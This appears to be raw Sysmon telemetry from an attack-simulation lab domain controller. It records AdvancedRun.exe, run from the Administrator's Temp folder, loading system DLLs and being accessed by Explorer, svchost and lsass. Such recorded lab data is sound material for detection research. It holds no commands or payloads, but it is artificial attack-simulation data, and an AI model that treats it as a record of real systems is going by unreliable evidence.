10341000x80000000000000004079689Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.522{834264DD-DB11-61EA-9500-000000002702}4284652C:\Windows\Explorer.EXE{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6263e|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator
10341000x80000000000000004079688Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.522{834264DD-DB11-61EA-9500-000000002702}4284652C:\Windows\Explorer.EXE{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61894|C:\Windows\System32\SHELL32.dll+62607|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator
10341000x80000000000000004079687Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.521{834264DD-DB11-61EA-9500-000000002702}4284652C:\Windows\Explorer.EXE{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Explorer.EXE+1f054|C:\Windows\Explorer.EXE+1f000|C:\Windows\Explorer.EXE+1dfec|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+15458f|C:\Windows\System32\windows.storage.dll+15330f|C:\Windows\System32\windows.storage.dll+1562bf|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator
10341000x80000000000000004079686Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.516{834264DD-DB10-61EA-9000-000000002702}33365092C:\Windows\System32\taskhostw.exe{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator
10341000x80000000000000004079685Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.516{834264DD-DB10-61EA-9000-000000002702}33365092C:\Windows\System32\taskhostw.exe{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d812|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator
10341000x80000000000000004079684Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.512{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+6163f|C:\Windows\System32\SHELL32.dll+62db0|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator
10341000x80000000000000004079683Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.511{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+47bc0|C:\Windows\System32\SHELL32.dll+62d6c|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator
10341000x80000000000000004079682Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.511{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+61894|C:\Windows\System32\SHELL32.dll+62d40|C:\Windows\System32\TwinUI.dll+12d711|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator
10341000x80000000000000004079681Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.511{834264DD-DB11-61EA-9500-000000002702}4285444C:\Windows\Explorer.EXE{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+12d549|C:\Windows\System32\TwinUI.dll+12df7f|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791ATTACKRANGE\AdministratorATTACKRANGE\Administrator
734700x80000000000000004079678Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.286{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Program Files (x86)\Common Files\Microsoft Shared\ink\tiptsf.dll10.0.14393.4169 (rs1_release.210107-1130)Touch Keyboard and Handwriting Panel Text Services FrameworkMicrosoft® Windows® Operating SystemMicrosoft CorporationTipTsf.dllMD5=917E8F9264946341B07DD6F1C2FF06C3,SHA256=5143C7496BD0ADF21693BB68661CD4967826485DE0A51F997309EFE4D86F21D6trueMicrosoft WindowsValidATTACKRANGE\Administrator
734700x80000000000000004079677Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.283{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\clbcatq.dll2001.12.10941.16384 (rs1_release.210107-1130)COM+ Configuration CatalogMicrosoft® Windows® Operating SystemMicrosoft CorporationCLBCATQ.DLLMD5=A5DBC147158A0FFB44246C9452A1C9E1,SHA256=D7763F384F902F00980FE6A2ED0F254AF0539B66AAABFF64413B0D17606000A9trueMicrosoft WindowsValidATTACKRANGE\Administrator
734700x80000000000000004079676Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.146{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\dwmapi.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft Desktop Window Manager APIMicrosoft® Windows® Operating SystemMicrosoft Corporationdwmapi.dllMD5=F6B687A32ABAE8BE3B02C122B58D952F,SHA256=DF763BDC4348BBEA93375263BF88E0BCD1267C58FC0F6E994F6D778D302DDE85trueMicrosoft WindowsValidATTACKRANGE\Administrator
734700x80000000000000004079675Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.144{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=7BC54AA66588A3DF7B1448A4493C6663,SHA256=9CB1BA7C092164DAA14E21454606905E294D137AD72158F92A666077D7CF1946trueMicrosoft WindowsValidATTACKRANGE\Administrator
734700x80000000000000004079674Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.143{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=0D885953D657434CA5015545A364BDB9,SHA256=1D29921E136F84B4CA9F1EBD646CFFF4571EA805A6CC5BC1F7C7784CC3246088trueMicrosoft WindowsValidATTACKRANGE\Administrator
734700x80000000000000004079673Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.143{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\msctf.dll10.0.14393.4530 (rs1_release.210705-0736)MSCTF Server DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationMSCTF.DLLMD5=2BE98799BE75460B5BFC4B7AAE16F1C0,SHA256=79206EE81A33F14D2EEA028AE188923A24C6E0E2FAFF10F2B58F265C69D13CBCtrueMicrosoft WindowsValidATTACKRANGE\Administrator
10341000x80000000000000004079672Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.141{834264DD-DAE7-61EA-1700-000000002702}13003532C:\Windows\System32\svchost.exe{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator
10341000x80000000000000004079671Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.141{834264DD-DAE7-61EA-1700-000000002702}13001340C:\Windows\System32\svchost.exe{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\System32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14412|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator
734700x80000000000000004079670Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.141{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\uxtheme.dll10.0.14393.4169 (rs1_release.210107-1130)Microsoft UxTheme LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationUxTheme.dllMD5=E1A1B98F2AD180FA2117A56D869E5830,SHA256=2D9711E9D549CCB441EF21F72F08FB4EACD5F2990193C6FFFC7E7AC92FA6E670trueMicrosoft WindowsValidATTACKRANGE\Administrator
10341000x80000000000000004079669Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.136{834264DD-DAE4-61EA-0C00-000000002702}652752C:\Windows\system32\lsass.exe{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\lsasrv.dll+6ea9c|C:\Windows\system32\lsasrv.dll+e6974|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+5460b|C:\Windows\System32\RPCRT4.dll+52cea|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791NT AUTHORITY\SYSTEMATTACKRANGE\Administrator
734700x80000000000000004079668Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.133{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\imm32.dll10.0.14393.0 (rs1_release.160715-1616)Multi-User Windows IMM32 API Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationimm32MD5=203F58BA41B48A59D6A047E0233DB422,SHA256=4204F7C2B4E13AA3819A180FACA724435F6400FE97D2EF6C74634A0D7E51F7F3trueMicrosoft WindowsValidATTACKRANGE\Administrator
734700x80000000000000004079667Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.130{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ole32.dll10.0.14393.4651 (rs1_release.210911-1554)Microsoft OLE for WindowsMicrosoft® Windows® Operating SystemMicrosoft CorporationOLE32.DLLMD5=935CA0F4A51D83AED974E5D589AB41E7,SHA256=C2D64CAE0D03B259EE0B27CE8012710B80DB3A5D1DFCA1ACB2018712A4DC294DtrueMicrosoft WindowsValidATTACKRANGE\Administrator
734700x80000000000000004079666Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.130{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\kernel.appcore.dll10.0.14393.2312 (rs1_release.180607-1919)AppModel API HostMicrosoft® Windows® Operating SystemMicrosoft Corporationkernel.appcore.dllMD5=4BA1C50E6607AE70495B58874963B901,SHA256=72BBBB4145E058C3B12504AC0EC128CD44E282D40959D018192899276A2B9C69trueMicrosoft WindowsValidATTACKRANGE\Administrator
734700x80000000000000004079665Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.130{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\advapi32.dll10.0.14393.4886 (rs1_release.220104-1735)Advanced Windows 32 Base APIMicrosoft® Windows® Operating SystemMicrosoft Corporationadvapi32.dllMD5=0887C15A40AA6286ABACDF5FA5EADFC8,SHA256=C031E35864A113C505E5E1CCBF9BE34164823C67E41604A60276D1B89ACE08D7trueMicrosoft WindowsValidATTACKRANGE\Administrator
734700x80000000000000004079664Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.129{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\powrprof.dll10.0.14393.0 (rs1_release.160715-1616)Power Profile Helper DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationPOWRPROF.DLLMD5=A6F22CA344FD1B7D75D49ECC718693C8,SHA256=C7787F59263B7D5246B931531AB4DC4C430E1BF8260775B7A751D4994A5D3489trueMicrosoft WindowsValidATTACKRANGE\Administrator
734700x80000000000000004079663Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.129{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\windows.storage.dll10.0.14393.4886 (rs1_release.220104-1735)Microsoft WinRT Storage APIMicrosoft® Windows® Operating SystemMicrosoft CorporationWindows.Storage.dllMD5=B77BEE429FC293E60D82B5733F3823EE,SHA256=7CA6CF34FBB9CDF160018C81B9D3A1894477918A67BA53E728689041DEA4C646trueMicrosoft WindowsValidATTACKRANGE\Administrator
734700x80000000000000004079662Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.129{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\cfgmgr32.dll10.0.14393.0 (rs1_release.160715-1616)Configuration Manager DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationCFGMGR32.DLLMD5=90A1CD387F9CB30F86D34B88BFCD83A1,SHA256=5F6CE9777CDC7B0A0E98C90709C41C379415DBA654A39B332BB683A7F2B86E97trueMicrosoft WindowsValidATTACKRANGE\Administrator
734700x80000000000000004079661Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.128{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\shell32.dll10.0.14393.4886 (rs1_release.220104-1735)Windows Shell Common DllMicrosoft® Windows® Operating SystemMicrosoft CorporationSHELL32.DLLMD5=F27E9ABE4DCD6E5CD27820AF12993889,SHA256=D67BA8D05C35C53CC669CFEB2FAA8139D389257EFE5209781438B4043694A763trueMicrosoft WindowsValidATTACKRANGE\Administrator
734700x80000000000000004079660Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.128{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\shlwapi.dll10.0.14393.4169 (rs1_release.210107-1130)Shell Light-weight Utility LibraryMicrosoft® Windows® Operating SystemMicrosoft CorporationSHLWAPI.DLLMD5=0FDEB9236FF287E329F2EF155BA8AE56,SHA256=5F0C2A29312C82D14B8B42D2B6AAFEB82EBAD20822B603FD162E6AAF39B06C95trueMicrosoft WindowsValidATTACKRANGE\Administrator
734700x80000000000000004079659Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.128{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\sechost.dll10.0.14393.4886 (rs1_release.220104-1735)Host for SCM/SDDL/LSA Lookup APIsMicrosoft® Windows® Operating SystemMicrosoft Corporationsechost.dllMD5=7635DDA92A9ACC5A31C18AF7B31DDF6D,SHA256=0BD8A481DF3DE0170DD1569F588AE70B9BB9D5C4DD34944F72208B9DEEF76BB6trueMicrosoft WindowsValidATTACKRANGE\Administrator
734700x80000000000000004079658Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.127{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\bcryptprimitives.dll10.0.14393.4770 (rs1_release.211101-1440)Windows Cryptographic Primitives LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationbcryptprimitives.dllMD5=6215B591FCA75825262B29613A48836C,SHA256=B34EED73CE76E4AA1A0812E9BE1AE093549B164341F988CA877E27E545C3C1B8trueMicrosoft WindowsValidATTACKRANGE\Administrator
734700x80000000000000004079657Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.127{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\SHCore.dll10.0.14393.4169 (rs1_release.210107-1130)SHCOREMicrosoft® Windows® Operating SystemMicrosoft CorporationSHCORE.dllMD5=E3851CE4A433475612CB0E1552A733E3,SHA256=F391BAA7AFF5734842737FC1B4C58856BA5E409A7B97C037995F0F26150A85FAtrueMicrosoft WindowsValidATTACKRANGE\Administrator
734700x80000000000000004079656Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.125{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\comdlg32.dll10.0.14393.4283 (rs1_release.210303-1802)Common Dialogs DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcomdlg32.dllMD5=A7152A41A642F6976B4226FA6A22F48D,SHA256=2DBDB16F905A9150669B9017D5C4A0AE75DBB6E52298F0FEFE1849C3FC5D9909trueMicrosoft WindowsValidATTACKRANGE\Administrator
734700x80000000000000004079655Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.125{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\cryptbase.dll10.0.14393.0 (rs1_release.160715-1616)Base cryptographic API DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptbase.dllMD5=3D4308BAC53B881B16D9BD1006ABDC65,SHA256=26DF85FC22F9FCAA2212CB66612FE8F5CC6382953FE81B9C34128E43080C7891trueMicrosoft WindowsValidATTACKRANGE\Administrator
734700x80000000000000004079654Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.125{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32full.dll10.0.14393.4886 (rs1_release.220104-1735)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=AB5AE3CC1EAA79B84589257A14BC2480,SHA256=BD0216233D84012BD61BE38964798F8F6686DA61E2E8E04D1B395AB8566CA084trueMicrosoft WindowsValidATTACKRANGE\Administrator
734700x80000000000000004079653Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.125{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\sspicli.dll10.0.14393.4704 (rs1_release.211004-1917)Security Support Provider InterfaceMicrosoft® Windows® Operating SystemMicrosoft Corporationsecurity.dllMD5=CF0985D6545196D0EBDCB6C2630BBDC1,SHA256=1990B384CE1E1809B90D617506DEF24E654CE7A4E93C5BDCD718DED2ECCC53A8trueMicrosoft WindowsValidATTACKRANGE\Administrator
734700x80000000000000004079652Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.124{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\profapi.dll10.0.14393.0 (rs1_release.160715-1616)User Profile Basic APIMicrosoft® Windows® Operating SystemMicrosoft CorporationPROFAPI.DLLMD5=CA6447DDCA724F0C5C0CAFDE184EFE64,SHA256=F9664337B60A332571FCA81CC3E6DD194DCE20C8546980FD283CA892D0CC873CtrueMicrosoft WindowsValidATTACKRANGE\Administrator
734700x80000000000000004079651Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.124{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\gdi32.dll10.0.14393.4169 (rs1_release.210107-1130)GDI Client DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationgdi32MD5=E9E209227AF7EFBFDAAA0B932251486D,SHA256=639DD063669F506790DA8C940E3BEBE4F7CF31668260F94CF5A67C93021D2BDFtrueMicrosoft WindowsValidATTACKRANGE\Administrator
734700x80000000000000004079650Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.123{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\rpcrt4.dll10.0.14393.4886 (rs1_release.220104-1735)Remote Procedure Call RuntimeMicrosoft® Windows® Operating SystemMicrosoft Corporationrpcrt4.dllMD5=8F533DC30B7304908AD1430FA64A8D05,SHA256=04FF1C778A63457B291BFD40C0A782A13E0D87E32707FA4BAEC728847299776CtrueMicrosoft WindowsValidATTACKRANGE\Administrator
734700x80000000000000004079649Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.123{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\ucrtbase.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationucrtbase.dllMD5=F058FE3C5E3DEF875A654A18551D88E5,SHA256=78DC0394AA359DBD2EB8BE7F13FEDF0478C8AA55785712B358FAC1C97D051B87trueMicrosoft WindowsValidATTACKRANGE\Administrator
734700x80000000000000004079648Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:18.121{834264DD-14CE-61EB-9F08-000000002702}4792C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exeC:\Windows\SysWOW64\win32u.dll10.0.14393.0 (rs1_release.160715-1616)Win32uMicrosoft® Windows® Operating SystemMicrosoft CorporationWin32u.DLLMD5=AF2A9437F3AED2E8254B7E1EB6E96782,SHA256=D8F3C957BDBD9DB510E71B07CDE1B446491D4DC520787548060B3AAD1324C62AtrueMicrosoft WindowsValidATTACKRANGE\Administrator
